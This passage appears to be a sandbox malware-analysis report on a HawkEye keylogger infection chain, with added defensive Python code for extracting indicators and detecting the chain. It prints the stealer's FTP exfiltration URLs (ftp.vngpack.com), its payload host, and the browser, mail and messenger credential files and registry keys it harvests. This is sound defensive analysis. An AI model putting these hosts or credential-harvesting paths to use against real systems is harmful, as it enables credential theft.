            Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmp | Binary or memory string: !Progman
            Source: C:\Users\user\AppData\Roaming\name.exe | Queries volume information: C:\Users\user\AppData\Roaming\name.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\name.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00406278 GetVersionExA,
            Source: C:\Users\user\AppData\Roaming\name.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM FirewallProduct

            Stealing of Sensitive Information:

            Yara detected HawkEye Keylogger
            Source: Yara match | File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Yara detected MailPassView
            Source: Yara match | File source: 5.2.InstallUtil.exe.36594d0.12.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.36594d0.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.45fa72.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.2176599122.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 944, type: MEMORYSTR
            Searches for Windows Mail specific files
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert7.db
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Tries to steal Mail credentials (via file access)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Tries to steal Mail credentials (via file registry)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: ESMTPPassword
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara match | File source: 4.2.name.exe.368a90f.10.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.36716f0.11.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.36716f0.11.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.36594d0.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3491d2f.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.409c0d.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.2179402637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2460, type: MEMORYSTR

            Remote Access Functionality:

            Detected HawkEye RatShow sources
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmpString found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt0wVl
            Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmpString found in binary or memory: mHSTOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
            Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmpString found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp; String found in binary or memory: mWftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp; String found in binary or memory: ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875%207.28.2021%205:26:06%20PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp; String found in binary or memory: m]ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875%207.28.2021%205:26:06%20PM.txt
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp; String found in binary or memory: HawkEyeKeylogger
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp; String found in binary or memory: m&HawkEye_Keylogger_Execution_Confirmed_
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp; String found in binary or memory: m"HawkEye_Keylogger_Stealer_Records_
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

Yara detected HawkEye Keylogger
Source: Yara match; File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
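The strings above give away the HawkEye stealer's drop point (an FTP account on ftp.vngpack.com) and the naming scheme of its upload files. As an added example that is not part of the Joe Sandbox report, the Python below scans a memory-dump buffer for those marker strings (as ANSI and as the UTF-16LE that .NET keeps strings in) and pulls the FTP upload URL apart into host, file name and record type, folding the raw and %20-encoded spellings the report lists into one entry. The input buffer is constructed from the reported strings, and the function and constant names are this example's own.

```python
import json
import re
from urllib.parse import unquote, urlparse

# Marker strings the report lists as found in InstallUtil.exe memory.
HAWKEYE_MARKERS = (
    "HawkEyeKeylogger",
    "HawkEye_Keylogger_Execution_Confirmed_",
    "HawkEye_Keylogger_Stealer_Records_",
    "HawkEye_Keylogger_Keylog_Records_",
    "HawkEye Keylogger | Execution Confirmed |",
    "HawkEye Keylogger | Stealer Records |",
)

# Upload file name fragments -> record type (derived from the same strings).
RECORD_KINDS = {
    "Execution_Confirmed": "execution_confirmed",
    "Stealer_Records": "stealer_records",
    "Keylog_Records": "keylog_records",
}

# A URL runs from the scheme to the first control byte or quote. Spaces are allowed
# because the report shows the raw file name with spaces next to its %20 spelling.
_FTP_RE = re.compile(rb"ftp://[^\x00-\x1f\"'<>]+")

# Constructed buffer modelled on the strings in the report; not a real dump.
# The bytes in front of "ftp://" and "HawkEye" mimic the junk the report shows
# (mW, m&, C) and must not end up in the parsed URL.
SAMPLE_DUMP = b"\x00".join([
    b"mWftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt",
    b"ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875%207.28.2021%205:26:06%20PM.txt",
    b"m&HawkEye_Keylogger_Execution_Confirmed_",
    b"\\pidloc.txt!HawkEyeKeylogger",
    ".jpegCHawkEye_Keylogger_Keylog_Records_".encode("utf-16-le"),  # .NET keeps strings as UTF-16LE
    b"http://whatismyipaddress.com/-",
])


def _views(data: bytes):
    """Yield the raw buffer plus ASCII projections of it read as UTF-16LE at both byte
    alignments, so one byte regex catches both ANSI and .NET (UTF-16LE) strings."""
    yield data
    for off in (0, 1):
        yield data[off:].decode("utf-16-le", errors="ignore").encode("ascii", errors="ignore")


def find_markers(data: bytes) -> dict:
    """Count each HawkEye marker string as ASCII and as UTF-16LE; absent markers are omitted."""
    counts = {}
    for marker in HAWKEYE_MARKERS:
        n = sum(data.count(marker.encode(enc)) for enc in ("ascii", "utf-16-le"))
        if n:
            counts[marker] = n
    return counts


def extract_ftp_exfil(data: bytes) -> list:
    """One dict per distinct FTP upload URL: host, decoded file name and record kind."""
    seen = {}
    for view in _views(data):
        for m in _FTP_RE.finditer(view):
            url = unquote(m.group(0).decode("ascii"))  # folds %20 and raw spellings together
            if url in seen:
                continue
            parts = urlparse(url)
            fname = parts.path.rsplit("/", 1)[-1]
            kind = next((v for k, v in RECORD_KINDS.items() if k in fname), "unknown")
            seen[url] = {"url": url, "host": parts.hostname, "filename": fname, "kind": kind}
    return [seen[k] for k in sorted(seen)]


def summarize(data: bytes) -> dict:
    """Triage view of one buffer: marker hits, upload URLs, drop hosts, and whether the
    channel is clear-text FTP (credentials and stolen records then cross the wire readable)."""
    exfil = extract_ftp_exfil(data)
    return {
        "markers": find_markers(data),
        "exfil": exfil,
        "exfil_hosts": sorted({e["host"] for e in exfil}),
        "cleartext_exfil": any(e["url"].startswith("ftp://") for e in exfil),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_DUMP), indent=2))
```

Run it against a real process dump (for example the 00000005.00000002.2366070064.0000000002AC6000 region above) by reading the file into `summarize()`; the host list is what goes to the block list, and a `cleartext_exfil` hit means the FTP session itself, including the account password, is recoverable from a packet capture.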

Mitre Att&ck Matrix

One tactic per line; the numbers the report shows beside a technique are kept in parentheses.

Initial Access: Valid Accounts (1); Replication Through Removable Media (1); Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (1); Native API (11); Shared Modules (1); Exploitation for Client Execution (13); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: Application Shimming (1); Valid Accounts (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Privilege Escalation: Application Shimming (1); Valid Accounts (1); Access Token Manipulation (1); Process Injection (412); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (31); Software Packing (11); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (21); Process Injection (412); Hidden Files and Directories (2); Right-to-Left Override
Credential Access: OS Credential Dumping (1); Input Capture (1); Credentials in Registry (2); Credentials In Files (1); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); Peripheral Device Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (18); Security Software Discovery (12); Virtualization/Sandbox Evasion (21); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
Lateral Movement: Replication Through Removable Media (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (2); Input Capture (1); Clipboard Data (1); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Exfiltration: Exfiltration Over Alternative Protocol (1); Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (12); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (33); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop

Behavior Graph

Behavior Graph ID: 455555; Sample: 280072109764552.doc; Start date: 28/07/2021; Architecture: WINDOWS; Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures

Process tree (the counters in brackets are the created-registry-value and created-file counts drawn next to each node in the graph):

• WINWORD.EXE [291 28] started
• EQNEDT32.EXE [12] started
  • Network: vecvietnam.com.vn (103.255.237.180), TCP 49167 -> 80, VNPT-AS-VNVNPTCorpVN, Viet Nam
  • Dropped: C:\Users\user\AppData\Roaming\name.exe (PE32); C:\Users\user\...\09867654270721.PDF[1].exe (PE32)
  • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • name.exe [12 3] started
    • Network: www.google.com (142.250.203.100), TCP 49168 -> 443, GOOGLEUS, United States
    • Dropped: C:\Users\user\AppData\...\InstallUtil.exe (PE32)
    • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 3 other signatures
    • InstallUtil.exe [13 7] started
      • Network: ftp.vngpack.com (45.141.152.18), TCP 49171, 49172 -> 21, M247GB, Romania; DNS: 3.246.11.0.in-addr.arpa
      • Signatures: Changes the view of files in windows explorer (hidden files and folders); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
      • vbc.exe [1] started: Tries to steal Mail credentials (via file registry); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access); Searches for Windows Mail specific files
      • vbc.exe [2] started: Tries to harvest and steal browser information (history, passwords, etc)
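The chain above (Equation Editor fetching a payload over HTTP and dropping name.exe; name.exe dropping a copy of InstallUtil.exe under %TEMP%; that copy injecting into vbc.exe and pushing records to an FTP server on port 21) is exactly what the Sigma hits in the signature list key on. As an added example, not the report's own logic and not the original Sigma rules, the Python below runs that detection logic over constructed Sysmon-style events modelled on the graph (process create, network connect, file create), using the PIDs 1776 and 2964 from the report plus two benign control events, and walks the parent chain back from the vbc.exe instances. Event field names, image paths and rule names are this example's own.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath

USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
DOTNET_DIRS = ("\\windows\\microsoft.net\\framework\\", "\\windows\\microsoft.net\\framework64\\")
DOTNET_COMPILERS = {"vbc.exe", "csc.exe", "jsc.exe"}

# Image paths used by the constructed events (hypothetical install locations).
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
NAME_EXE = r"C:\Users\user\AppData\Roaming\name.exe"
INSTALLUTIL_COPY = r"C:\Users\user\AppData\Local\Temp\InstallUtil.exe"
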